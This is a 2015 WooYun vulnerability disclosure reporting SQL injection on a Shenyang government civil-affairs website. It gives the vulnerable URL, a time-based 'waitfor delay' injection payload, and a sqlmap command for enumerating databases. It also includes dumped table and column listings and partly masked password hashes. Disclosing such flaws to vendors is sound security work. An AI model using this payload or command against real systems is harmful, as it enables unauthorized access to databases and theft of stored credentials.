当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099262

漏洞标题:沈阳市民政信息网大量信息泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 千斤拨四两

提交时间:2015-03-04 12:22

修复时间:2015-04-18 12:24

公开时间:2015-04-18 12:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-09: 厂商已经确认,细节仅向厂商公开
2015-03-19: 细节向核心白帽子及相关领域专家公开
2015-03-29: 细节向普通白帽子公开
2015-04-08: 细节向实习白帽子公开
2015-04-18: 细节向公众公开

简要描述:

注射

详细说明:

http://www.symzj.gov.cn/symz/wsdc.jsp
post数据:dc=3%3b%20waitfor%20delay%20%270%3a0%3a3.058%27%20--%20

sqlmap.py -u "http://www.symzj.gov.cn/symz/wsdc.jsp" --data "
dc=3" --level 3 --dbs


43
 dbo.comd_list
 dbo.dtest
 dbo.dtproperties
 dbo.fc_result
 dbo.jc_download
 dbo.jc_upload
 dbo.jc_users
 dbo.mj_2005_1a
 dbo.mj_2005_1b
 dbo.mj_2005_2a
 dbo.mj_2005_2b
 dbo.mj_2005_3a
 dbo.mj_2005_3b
 dbo.mj_2005_4a
 dbo.mj_2005_4b
 dbo.mj_2005_5a
 dbo.mj_2005_5b
 dbo.mj_2005_6a
 dbo.mj_2005_7a
 dbo.mj_2005_8a


Database: symz
Table: dbo.jc_users
[179 columns]
+-------------------------------------+-------------+
| Column                              | Type        |
+-------------------------------------+-------------+
| abfrsql                             | non-numeric |
| address_id                          | non-numeric |
| adminemail                          | non-numeric |
| adminid                             | non-numeric |
| administrators                      | non-numeric |
| adminpass                           | non-numeric |
| adminpassword                       | non-numeric |
| adminpaw                            | non-numeric |
| album_id                            | non-numeric |
| alias                               | non-numeric |
| alias_area_id                       | non-numeric |
| allowpostannounce                   | non-numeric |
| allowrefund                         | non-numeric |
| ana_codice                          | non-numeric |
| apply                               | non-numeric |
| apwd                                | non-numeric |
| area_id                             | non-numeric |
| authentification                    | non-numeric |
| authentifier                        | non-numeric |
| avp_codigo                          | non-numeric |
| bloc_row                            | non-numeric |
| bn_id                               | non-numeric |
| bsur_id                             | non-numeric |
| callstart                           | non-numeric |
| cardid                              | non-numeric |
| categories                          | non-numeric |
| class_id                            | non-numeric |
| cleanurl                            | non-numeric |
| clef                                | non-numeric |
| cod_aplicacion                      | non-numeric |
| codeid                              | non-numeric |
| codi                                | non-numeric |
| comment5                            | non-numeric |
| commentpath                         | non-numeric |
| complet                             | non-numeric |
| conkey                              | non-numeric |
| consommateur                        | non-numeric |
| corso                               | non-numeric |
| cp_id                               | non-numeric |
| csv_id                              | non-numeric |
| dataricovero                        | non-numeric |
| deliv_id                            | non-numeric |
| dept_number                         | non-numeric |
| derived_id                          | non-numeric |
| descr                               | non-numeric |
| desd_xfase                          | non-numeric |
| disma                               | non-numeric |
| disp_name                           | non-numeric |
| domicilio_id                        | non-numeric |
| editionnumber                       | non-numeric |
| eid                                 | non-numeric |
| email                               | non-numeric |
| emer                                | non-numeric |
| emri                                | non-numeric |
| fieldid                             | non-numeric |
| file                                | non-numeric |
| file5                               | non-numeric |
| fjalekalimi                         | non-numeric |
| fjalekalimin                        | non-numeric |
| fre_codigo                          | non-numeric |
| help                                | non-numeric |
| hid                                 | non-numeric |
| host                                | numeric     |
| id_auteur                           | non-numeric |
| id_estado                           | non-numeric |
| id_fatura                           | non-numeric |
| id_links                            | non-numeric |
| id_log                              | non-numeric |
| id_message                          | non-numeric |
| id_syndic_article                   | non-numeric |
| idextra                             | non-numeric |
| idlocation                          | non-numeric |
| indice_id                           | non-numeric |
| indirizzo                           | non-numeric |
| investigator_id                     | non-numeric |
| item                                | non-numeric |
| jfalternative                       | non-numeric |
| jfcontent                           | non-numeric |
| jfrouter                            | non-numeric |
| jfsections                          | non-numeric |
| job_e_date                          | non-numeric |
| lake_id                             | non-numeric |
| last_login                          | non-numeric |
| lastposter                          | non-numeric |
| lasttid                             | numeric     |
| lname                               | numeric     |
| localita                            | non-numeric |
| login_pass                          | non-numeric |
| login_passwd                        | non-numeric |
| login_password                      | non-numeric |
| login_pwd                           | numeric     |
| loginkey                            | non-numeric |
| loginpas                            | non-numeric |
| loginpass                           | non-numeric |
| loginpasswd                         | non-numeric |
| loginpwd                            | non-numeric |
| luogoid                             | non-numeric |
| main2                               | non-numeric |
| manuscriptid                        | non-numeric |
| meetingid                           | non-numeric |
| menutype                            | non-numeric |
| meta_id                             | non-numeric |
| mod_arcadebtn                       | non-numeric |
| mod_donimedia_select_box_menu_type1 | non-numeric |
| mod_freeway_services                | non-numeric |
| mod_gtranslate                      | non-numeric |
| mod_jumplink                        | non-numeric |
| module_addr                         | non-numeric |
| mountname                           | non-numeric |
| n_client                            | non-numeric |
| n_id                                | non-numeric |
| newpms                              | non-numeric |
| newrow                              | non-numeric |
| newyork                             | non-numeric |
| nroordine                           | non-numeric |
| object_sub_class_id                 | non-numeric |
| oggettistica                        | non-numeric |
| online_id                           | non-numeric |
| pass_w                              | non-numeric |
| pass_word                           | non-numeric |
| passw                               | non-numeric |
| perdoruesi                          | non-numeric |
| person_id                           | non-numeric |
| php_dir                             | non-numeric |
| pid2                                | non-numeric |
| pl                                  | non-numeric |
| point                               | non-numeric |
| post_status                         | non-numeric |
| postdatetime                        | non-numeric |
| prc_sconto1                         | non-numeric |
| prc_sconto4                         | non-numeric |
| privmsgs_id                         | non-numeric |
| privmsgs_text_id                    | non-numeric |
| prune_id                            | non-numeric |
| prz_merce_fis                       | non-numeric |
| published                           | non-numeric |
| publisher                           | non-numeric |
| pw                                  | non-numeric |
| qname                               | non-numeric |
| rating_id                           | non-numeric |
| ref_url                             | non-numeric |
| relationsub                         | non-numeric |
| repid                               | non-numeric |
| risultato                           | non-numeric |
| rpad                                | non-numeric |
| schlusselwort                       | non-numeric |
| secret                              | non-numeric |
| secret_code                         | non-numeric |
| secretcode                          | non-numeric |
| sheight                             | non-numeric |
| situacao_id                         | non-numeric |
| sklep1                              | non-numeric |
| startnummer                         | non-numeric |
| stat_name                           | non-numeric |
| stock                               | non-numeric |
| sub_comment1                        | non-numeric |
| sub_large_image1                    | non-numeric |
| tax_rate_id                         | non-numeric |
| ticket_id                           | non-numeric |
| titleid                             | non-numeric |
| touche                              | non-numeric |
| usager                              | non-numeric |
| user_password                       | non-numeric |
| user_pw                             | non-numeric |
| user_usern                          | non-numeric |
| users                               | non-numeric |
| usr_pass                            | non-numeric |
| usrnm                               | non-numeric |
| usrpass                             | non-numeric |
| utenteid                            | non-numeric |
| utilisateur                         | non-numeric |
| ver_codice                          | non-numeric |
| virtuemart                          | non-numeric |
| vote_id                             | non-numeric |
| vtyp_id                             | non-numeric |
| waiting_list_id                     | non-numeric |
| word_text                           | non-numeric |
| yhm                                 | non-numeric |
| you                                 | non-numeric |
+-------------------------------------+-------------+


Database: symz
Table: dbo.jc_users
[9 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| fzr_name | varchar |
| gl_id    | int     |
| id       | int     |
| level    | varchar |
| link     | varchar |
| name     | varchar |
| password | varchar |
| state    | varchar |
| username | varchar |
+----------+---------+


mask 区域 
*****ode*****
*****e: s*****
*****o.jc_*****
*****trie*****
*****------------*****
*****            *****
*****------------*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****ba59abbe56e0*****
*****------------*****
*****cod*****

漏洞证明:

shuju .png


shuju1.png


11.png


修复方案:

你们都懂的!!!!

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-09 10:43

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论